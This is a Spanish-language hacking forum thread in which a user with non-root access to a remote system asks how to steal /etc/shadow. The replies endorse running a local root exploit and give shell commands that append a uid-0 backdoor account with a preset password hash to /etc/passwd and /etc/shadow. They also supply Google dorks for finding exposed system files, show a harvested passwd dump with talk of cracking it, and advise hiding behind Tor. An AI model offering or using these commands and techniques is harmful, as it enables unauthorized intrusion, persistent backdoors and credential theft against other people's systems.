archivo /etc/passwd

[JAVS]

hola amigos k tal komo estan ,,
hay halgo que no he podido hacer & es traerme el archivo /etc/shadow de un sistema remoto, entrando con un usuario diferente al root y que por supuesto no tiene permisos para copiar ese archivo,,,,,,, saben de alguna forma para copiarlo,,     mil graciaaaaaasss y felicitaciones al duro que me de la solucion ,,, y a los que tienen la voluntad tambien,,,
feliz navidad vacanes!!!!!!!!

[CiberPunk]

Pues si no tienes permiso creo que no hay opcion alguna; hasta donde se.

Aunque teclearlas no es mala idea, pero en si tienes permiso de ejecucion. para que puedas dejar a escucha algun puerto.

Saludos

[nanonroses]

si no tienes permisos de ejecucion no puedes hacer nada, lo unico que te queda es tratar de ejecutar algun explit que consiga la sheel de root, asi entrando a la shell como root, creas un user con permiso de WRX , como por ej si ya entraste seria asi :

cd /; uname -a; pwd; id; sistemas que estamos trabajando:::directorio que nos encontramos::ID que tenemos

Nos responderia algo asi :

Linux apollo.uicmba. edu 2.2.5-15 #1 Mon Apr 22 22:21:09 EDT 2000 i586 unknown
/
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
echo "aqaui el user que vas a crear::506:506::/home/user creado:/bin/bash" >> /etc/passwd
echo "el usuario creado:w3nT2H0b6AjM2:::::::" >> /etc/shadow

ahora que estas adentro, creas un user con perimos de root osea --uid=0

echo "nanonroses::0:0::/:/bin/bash" >> /etc/passwd
echo "nanonroses:w3nT2H0b6AjM2:::::::" >> /etc/shadow

ahi recien puedes copiar el etc/passwd........  googleaando se encuentra el exploit, si mas no recuerdo se llama bj.c  o algo asi en realidad no me acuerdo

[JAVS]

Primero que todo ,, mis saludos y mil gracias por la ayuda recibida,,,
l a verdad es que  no tengo experiencia sobre el uso de exploit...
ya tengo el codigo fuente del bj,c,,   pero alguien es tan amable
en enviarme el procedimiento detallado paso a paso para conseguir la shell del root y crear el usuario con derechos de root,,,,,,
Nuevamente amigos   un millon de gracias
 mi email   ************************

NO MAIL¡ OzX

[arkangelcrow]

hola amiguito! jajajaja

bueno haz lo siguiente...

metete a google y pon esto:

Código:

intitle:"index of private" site:net

hay te saldran todas las site .net
en este caso pones la website que buscas portalhacker.n et
XD solo que esta tiene la configuracion cerrada pero los webmaster por lo general tienen abiertos los root

si buscas /etc/passwd solo bastara poner en google
 

Código:

allintitle: "index of/etc"

o lo ke tu imaginacion quiera

bueno desde ya haz lo que quieras!

[hormiga-revolucionaria]

Arka
mira primero gracias esa informaicon es valiosa:P hjaja
me va a servir
pero ya busque eso q deci de lso /etc

y encontre muchas cosas ocmo estas

root:!:0:0::/:/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/usr/adm:
uucp:!:5:5::/usr/spool/uucppublic:/usr/lib/uucp/uucico
guest:!:100:100::/usr/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:104:9::/:
ftp:*:200:101::/u/ftp:/bin/ksh
anonymou:*:201:101::/u/ftp:/bin/ksh
ftpadmin:!:199:3::/u/ftp:/bin/ksh

pero hasta ahi llegue...nose que hacer ahora

q hago??? las guardo con estencion .pwd y las desencripto con john?
nose decime o tirame una punta
slaudos
grax desde ya

[JAVS]

Disculpen si no he planteado bien lo que necesito,,,,
a ver:::::  
tengo acceso a un sitema remoto pero no es root
los password estan en shadow
el shadow no lo puedo copiar para crakearlo por que el usuario con el que puedo ingresar no tiene permisos para copiarlo.
entonces una posible solucion es entrar con ese usuario y ejecutar el exploit bj.c para conseguir la shell del root y poder crear un usuario con permisos de root.
pero no se como es el procedimiento para ejecutar el exploit despues de haber ingresado con el usuario que no es root..

Agradezco de antemano vuestra ayuda.
Atte.
jhon!!!!

[arkangelcrow]

Arka
mira primero gracias esa informaicon es valiosa:P hjaja
me va a servir
pero ya busque eso q deci de lso /etc

y encontre muchas cosas ocmo estas

root:!:0:0::/:/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/usr/adm:
uucp:!:5:5::/usr/spool/uucppublic:/usr/lib/uucp/uucico
guest:!:100:100::/usr/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:104:9::/:
ftp:*:200:101::/u/ftp:/bin/ksh
anonymou:*:201:101::/u/ftp:/bin/ksh
ftpadmin:!:199:3::/u/ftp:/bin/ksh

pero hasta ahi llegue...nose que hacer ahora

q hago??? las guardo con estencion .pwd y las desencripto con john?
nose decime o tirame una punta
slaudos
grax desde ya

ve si hay claves. logs . info .de utilidad aveces las webs tienen logeos a Base de .txt
si que puedes darte atribuciones con las contraseñas o info adquirida

y recuerda usar tor, jap o similar para camuflarte >_< (proxy servers)

[JAVS]

 
Heyyy,,,
regalame un exploit para conseguir la shell del root, pero no en lenguaje c,,
si no en shell script de linux,,,
Muuuuuuuchasss s    gracias   

[arkangelcrow]

Heyyy,,,
regalame un exploit para conseguir la shell del root, pero no en lenguaje c,,
si no en shell script de linux,,,
Muuuuuuuchasss s    gracias   

hacia quien fue esa peticion

[JAVS]

---------------------

postea de nuevo, porfavor¡¡¡ lean las reglas no mayusculas porfavor.

[PiCkSiE]

Se salieron mucho del tema ya, porque no mejor ponen en:


Para ver este enlace Registrate o Inicia Sesion

www.google.com/linux

formato del archivo /etc/passwd

o algo asi por el estilo?

[Kalleja]

NO se

[Ther0x]

NO se

Por favor, esa respuesta está fuera de lugar. Para empezar no se que pinta ahí, porque ni es una duda y una respuesta... Pero además han pasado 6 meses de que se olvidó ese tema.
Está prohibido revivir temas de más de 3 meses de antiguedad.

Saludos